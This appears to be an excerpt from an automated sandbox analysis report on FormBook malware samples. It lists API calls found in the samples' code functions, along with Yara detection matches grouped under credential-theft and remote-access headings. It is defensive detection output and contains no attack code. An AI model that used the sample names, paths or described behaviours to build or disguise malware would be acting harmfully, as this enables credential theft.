Source: C:\Users\Public\vbc.exe Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 4_2_042F589C
Source: C:\Users\Public\vbc.exe Code function: GetLocaleInfoA, 4_2_042FA694
Source: C:\Users\Public\vbc.exe Code function: GetLocaleInfoA, 4_2_042FA6E0
Source: C:\Users\Public\vbc.exe Code function: GetLocaleInfoA, 4_2_042F61B4
Source: C:\Users\Public\vbc.exe Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 4_2_042F59A7
Source: C:\Users\Public\vbc.exe Code function: GetLocaleInfoA,GetACP, 4_2_042FBB5C
Source: C:\Users\Public\vbc.exe Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 4_2_003D57EC
Source: C:\Users\Public\vbc.exe Code function: GetLocaleInfoA, 4_2_003D6104
Source: C:\Users\Public\vbc.exe Code function: GetLocaleInfoA, 4_2_003DA484
Source: C:\Users\Public\vbc.exe Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 4_2_003D58F6
Source: C:\Users\Public\vbc.exe Code function: GetLocaleInfoA, 4_2_003DB900
Source: C:\Users\user\Esfjmbxd.exe Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 8_2_00405984
Source: C:\Users\user\Esfjmbxd.exe Code function: GetLocaleInfoA, 8_2_004062CC
Source: C:\Users\user\Esfjmbxd.exe Code function: GetLocaleInfoA,GetACP, 8_2_0040CAF8
Source: C:\Users\user\Esfjmbxd.exe Code function: GetLocaleInfoA, 8_2_0040B4DC
Source: C:\Users\user\Esfjmbxd.exe Code function: GetLocaleInfoA, 8_2_0040B528
Source: C:\Users\user\Esfjmbxd.exe Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 8_2_00405A8F
Source: C:\Users\user\Esfjmbxd.exe Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 8_2_03A2589C
Source: C:\Users\user\Esfjmbxd.exe Code function: GetLocaleInfoA, 8_2_03A261B4
Source: C:\Users\user\Esfjmbxd.exe Code function: GetLocaleInfoA, 8_2_03A2A694
Source: C:\Users\user\Esfjmbxd.exe Code function: GetLocaleInfoA, 8_2_03A2A6E0
Source: C:\Users\user\Esfjmbxd.exe Code function: GetLocaleInfoA,GetACP, 8_2_03A2BB5C
Source: C:\Users\user\Esfjmbxd.exe Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 8_2_03A259A7
Source: C:\Users\user\Esfjmbxd.exe Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 8_2_01D657EC
Source: C:\Users\user\Esfjmbxd.exe Code function: GetLocaleInfoA, 8_2_01D66104
Source: C:\Users\user\Esfjmbxd.exe Code function: GetLocaleInfoA, 8_2_01D6A484
Source: C:\Users\user\Esfjmbxd.exe Code function: GetLocaleInfoA, 8_2_01D6B900
Source: C:\Users\user\Esfjmbxd.exe Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 8_2_01D658F6
Source: C:\Users\user\Esfjmbxd.exe Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 11_2_00405984
Source: C:\Users\user\Esfjmbxd.exe Code function: GetLocaleInfoA, 11_2_004062CC
Source: C:\Users\user\Esfjmbxd.exe Code function: GetLocaleInfoA,GetACP, 11_2_0040CAF8
Source: C:\Users\user\Esfjmbxd.exe Code function: GetLocaleInfoA, 11_2_0040B4DC
Source: C:\Users\user\Esfjmbxd.exe Code function: GetLocaleInfoA, 11_2_0040B528
Source: C:\Users\user\Esfjmbxd.exe Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 11_2_00405A8F
Source: C:\Users\user\Esfjmbxd.exe Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 11_2_03C1589C
Source: C:\Users\user\Esfjmbxd.exe Code function: GetLocaleInfoA, 11_2_03C161B4
Source: C:\Users\user\Esfjmbxd.exe Code function: GetLocaleInfoA, 11_2_03C1A6E0
Source: C:\Users\user\Esfjmbxd.exe Code function: GetLocaleInfoA, 11_2_03C1A694
Source: C:\Users\user\Esfjmbxd.exe Code function: GetLocaleInfoA,GetACP, 11_2_03C1BB5C
Source: C:\Users\user\Esfjmbxd.exe Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 11_2_03C159A7
Source: C:\Users\user\Esfjmbxd.exe Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 11_2_003D57EC
Source: C:\Users\user\Esfjmbxd.exe Code function: GetLocaleInfoA, 11_2_003D6104
Source: C:\Users\user\Esfjmbxd.exe Code function: GetLocaleInfoA, 11_2_003DA484
Source: C:\Users\user\Esfjmbxd.exe Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 11_2_003D58F6
Source: C:\Users\user\Esfjmbxd.exe Code function: GetLocaleInfoA, 11_2_003DB900
Source: C:\Users\Public\vbc.exe Code function: 4_2_00409F7C GetLocalTime, 4_2_00409F7C
Source: C:\Users\Public\vbc.exe Code function: 4_2_0043DD6C GetVersion, 4_2_0043DD6C

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match File source: 18.0.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.logagent.exe.72480000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.logagent.exe.72480000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.logagent.exe.72480000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.logagent.exe.72480000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.logagent.exe.72480000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.logagent.exe.72480000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.logagent.exe.72480000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.logagent.exe.72480000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.logagent.exe.72480000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.logagent.exe.72480000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.logagent.exe.72480000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.logagent.exe.72480000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.72480000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000012.00000000.634841930.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.608536572.000000000481C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.620328507.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.679947342.0000000000200000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.618763905.00000000000C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.522632126.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.613019160.0000000000190000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.619325801.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.647079349.000000000487C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.526861084.0000000004990000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.615131533.0000000000120000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.524711132.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.608637561.0000000004874000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000000.598639768.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.527023129.0000000072481000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.608694553.0000000072481000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.522033457.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.633936132.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.647442314.0000000072481000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.649627126.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.552620615.000000000977D000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.679695031.0000000000100000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.647169348.00000000048D4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000000.596046676.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.615524302.0000000000290000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.571508744.000000000977D000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.632901217.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.633270454.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.613597049.00000000006B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000000.595476317.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.520406918.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000000.599301608.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.679811889.00000000001D0000.00000040.00020000.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook
Source: Yara match File sources: the same unpacked PE and memory dump matches listed under Stealing of Sensitive Information above
Source: Yara match File source: 00000006.00000000.520406918.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000000.599301608.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.679811889.00000000001D0000.00000040.00020000.sdmp, type: MEMORY